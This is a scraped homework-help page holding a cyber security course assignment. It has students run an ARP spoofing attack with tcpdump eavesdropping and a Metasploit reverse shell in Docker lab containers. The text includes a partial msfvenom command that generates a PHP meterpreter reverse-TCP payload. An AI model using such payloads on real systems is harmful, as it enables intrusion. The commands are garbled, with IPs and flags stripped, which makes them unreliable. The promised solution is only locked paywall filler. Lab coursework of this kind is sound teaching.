Question: CSCI 4 4 0 Cyber Security ( Spring 2 0 2 4 ) Assignment 4 Nam Score 1 0 Due date: Saturday, 1 3 t
CSCI Cyber Security
Spring
Assignment
Nam
Score
Due date: Saturday, of April by : PM
The purpose of the Assignment is to understand how network attacks can exploit vulnerabilities in network.
Part : ARP Spoofing Attack
points In order to start your Part first create a vulnerable network and pull and run docker images from dockerHub using the following commands Use IP address given below:
Create a vulnerable network: docker network create vulnerable attachable subnet
Attacker: docker run name attacker it rm privileged hostname attacker network vulnerable ipenv
DISPLAY$DISPLAY
In this part, show your work how the attacker server can eavesdrop packets coming from Victim to Normal Server in the following steps:
Run a client program client in Victim and a server program server in Normal Server respectively client and server. are given after you compile them @ client client. gcc o server server.c
# Change IP address of server in client.c accordingly to connect to the server!
Run a fake arpsender program on attacker server fake is given in the class Before running, compile the arpsender first.
Run tcpdump program in attacker to watch the packets.
Victim sends a following sentence: "Hello Normal Server: this is my password qwer!" to Normal Server.
Victim communicates with Normal Server by sending continuous messages including "This is a continuous message.. "This is a continuous message... "This is a continuous message...
Attacker finds out all the sent messages whenever the Victim sends a message in tcpdump packets.
The captured screen should show that TCP message is dumped in the attacker's server.
Show all your works by submitting screen shots and descriptions for each step.
Part : Using a Reverse Shell in Metasploit
points Reverse shell allows the attacker listen on the attacker's machine waiting for the target server to connect to the attacker's machine. Perform the attack in the following steps and show all your works in the screen shots and descriptions for each step.
In order to start your Part pull and run a docker image from dockerHub for target container server using the following commands Use IP address given below:Use Attacker server running for Part with IP address,
Get a reverse PHP shell on attacker's server: Run the following command to generate a payload in PHP format.
msfvenom p phpmeterpreterreversetcp LHOST
Step by Step Solution
There are 3 Steps involved in it
1 Expert Approved Answer
Step: 1 Unlock
Question Has Been Solved by an Expert!
Get step-by-step solutions from verified subject matter experts
Step: 2 Unlock
Step: 3 Unlock
